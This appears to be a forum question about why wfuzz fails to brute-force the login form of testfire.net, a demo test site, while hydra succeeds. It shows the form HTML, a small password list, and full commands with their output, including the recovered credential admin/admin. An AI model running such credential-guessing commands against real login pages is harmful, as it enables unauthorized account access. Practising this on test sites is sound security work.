Test site: http://testfire.net/login.jsp
Error when login failed: Login Failed: We're sorry, but this username or password was not found in our system. Please try again.
Web Form
```
<form action="doLogin" method="post" name="login" id="login" onsubmit="return (confirminput(login));">
  <table>
    <tbody><tr>
      <td> Username: </td>
      <td> <input type="text" id="uid" name="uid" value="" style="width: 150px;"> </td>
      <td> </td>
    </tr>
    <tr>
      <td> Password: </td>
      <td> <input type="password" id="passw" name="passw" style="width: 150px;"> </td>
    </tr>
    <tr>
      <td></td>
      <td> <input type="submit" name="btnSubmit" value="Login"> </td>
    </tr>
    </tbody></table>
</form>
```
The actual password is `admin` too. Therefore, I created a simple `passlist.txt` for this purpose.
```
wolf@linux:~$ cat passlist.txt
admin
pwd
pass
password
wolf@linux:~$
```
wfuzz flag
--ss/hs regex : Show/Hide responses with the specified regex within the content
Here are a few tests, but none of them really work.
wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/doLogin
```
wolf@linux:~$ wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/doLogin

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://testfire.net/doLogin
Total requests: 4

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000003:   302        0 L      0 W      0 Ch        "pass"
000000004:   302        0 L      0 W      0 Ch        "password"
000000001:   302        0 L      0 W      0 Ch        "admin"
000000002:   302        0 L      0 W      0 Ch        "pwd"

Total time: 0.517212
Processed Requests: 4
Filtered Requests: 0
Requests/sec.: 7.733766

wolf@linux:~$
```
wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/login.jsp
```
wolf@linux:~$ wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/login.jsp

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://testfire.net/login.jsp
Total requests: 4

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000003:   200        194 L    582 W    8519 Ch     "pass"
000000001:   200        194 L    582 W    8519 Ch     "admin"
000000002:   200        194 L    582 W    8519 Ch     "pwd"
000000004:   200        194 L    582 W    8519 Ch     "password"

Total time: 0.583132
Processed Requests: 4
Filtered Requests: 0
Requests/sec.: 6.859507

wolf@linux:~$
```
It didn’t work even though the right user/pass combination was there.
Any idea what’s wrong in this `wfuzz` syntax?
`hydra` can do this without any problem and identified the credential accurately.
```
wolf@linux:~$ hydra testfire.net http-post-form \
> '/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login failed' \
> -l admin -P passlist.txt -V
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-08 08:57:36
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking http-post-form://testfire.net:80/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login failed
[ATTEMPT] target testfire.net - login "admin" - pass "admin" - 1 of 4 [child 0] (0/0)
[ATTEMPT] target testfire.net - login "admin" - pass "pwd" - 2 of 4 [child 1] (0/0)
[ATTEMPT] target testfire.net - login "admin" - pass "pass" - 3 of 4 [child 2] (0/0)
[ATTEMPT] target testfire.net - login "admin" - pass "password" - 4 of 4 [child 3] (0/0)
[80][http-post-form] host: testfire.net   login: admin   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-08 08:57:39
wolf@linux:~$
```